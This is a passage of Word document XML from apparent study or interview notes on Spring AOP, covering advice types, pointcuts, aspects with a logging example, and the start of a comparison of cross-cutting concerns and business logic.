          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs after the method execution, only if the method completes without throwing an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA823B" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1947"/>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After Throwing Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs after the method execution, only if the method throws an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62E594" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1947"/>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Around Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Surrounds the method execution, allowing you to decide whether to proceed with the method call or not. It has the power to control the execution of the method (e.g., to skip method execution or modify the return value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E37EF"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01848526" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1948"/>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Before advice will run before the actual method starts executing, and @After advice will run after the method execution ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4B48E"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Before("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBF9CCD"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public void logBefore(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF5B62"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System.out.println("Logging before: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91A2A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18E736" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Pointcut:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6ACBAC" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1949"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pointcut</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an advice should be applied. It is an expression that matches certain join points (methods) where the advice will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F146326" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1949"/>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Pointcuts are used to specify which methods or classes are targeted by the advice. Pointcut expressions are often written in AspectJ expression language, such as execution(), within(), args(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C5E3A" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1949"/>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The pointcut is essentially a filter that determines which methods should be intercepted and advised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27C476"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8EA8F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1950"/>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A pointcut expression like execution(* com.example.service.*.*(..)) targets all methods within the com.example.service package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B6E5A"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Pointcut("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63055D04"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public void serviceMethods() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCE58FD"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 Pointcut definition (no implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38C964"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92AEE3" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Aspect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BFEB9" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1951"/>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An </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modularized</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unit of cross-cutting functionality in an application. It combines the </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pointcut</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and defines how the advice should be applied at the specified join points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377EB40" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1951"/>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lastRenderedPageBreak/>
        <w:t>An aspect is a class annotated with @Aspect, and it typically contains one or more advices and pointcuts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88F3C1" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1951"/>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In Spring, the aspect is applied to the target object using AOP proxies, and it acts as a modular component that encapsulates cross-cutting concerns (like logging, security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC168B"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF9ADC3" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1952"/>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A logging aspect could contain </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> advices to log method execution details across all methods in the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BCE75"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Aspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C3652"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CBD23"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public class LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3096EC"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p>
    <w:p w14:paraId="461A9FD8"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Before("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672FF95"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public void logBefore(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3B001"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System.out.println("Logging before method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243C4AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDCB7B3"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p>
    <w:p w14:paraId="1A80373B"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After("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D386CF"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public void logAfter(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E78BC4"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System.out.println("Logging after method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9AC80"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8BA395"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F7958" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF2C98" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1953"/>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JoinPoint</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A point during the execution of a program, such as method execution, where an aspect can be applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E6E01" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1953"/>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Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The action taken at a join point (before, after, around, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEEB56" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1953"/>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Pointcut</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A condition (expression) that defines which join points the advice should be applied to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F72D50" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1953"/>
        </w:num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Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A module that combines advice and pointcuts to define cross-cutting concerns and how they should be applied to the target methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299245A2" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>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These concepts help modularize concerns that affect multiple parts of an application, such as logging, security, or transaction management, allowing cleaner and more maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592B92C" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD6436">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1497"/>
        </w:tabs>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195684A">
          <v:rect id="_x0000_i2137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6AFBD" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc196307937"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between cross-cutting concern and business logic?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w14:paraId="4E0C4C99" w14:textId="0D1B0D87" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Cross-cutting concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two distinct aspects of application development that have different responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E35FE6" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2DDFC" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1954"/>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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Business logic refers to the core functionality of an application, which handles the specific operations that define the business rules or processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AE7CE" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1954"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It implements the actual logic that drives the application's value, such as calculations, data processing, validation, and any functionality directly related to the domain of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BD32E" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1954"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In an e-commerce application, the business logic would include things like processing orders, calculating the total price, applying discounts, or determining shipping costs based on the user’s location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1639A"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Business Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986E743" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1955"/>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In an online banking system, the logic for transferring money between accounts is business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762A06D"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public void transferMoney(Account fromAccount, Account toAccount, double amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB13A15"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if (fromAccount.getBalance() &gt;= amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E1237"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fromAccount.debit(amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDB8F9"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toAccount.credit(amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DFF00"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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC74F9"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throw new InsufficientFundsException();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520435C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4DE2A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BBE82" w14:textId="77777777" w:rsidR="002C40B5" w:rsidRPr="008045FC" w:rsidRDefault="002C40B5" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
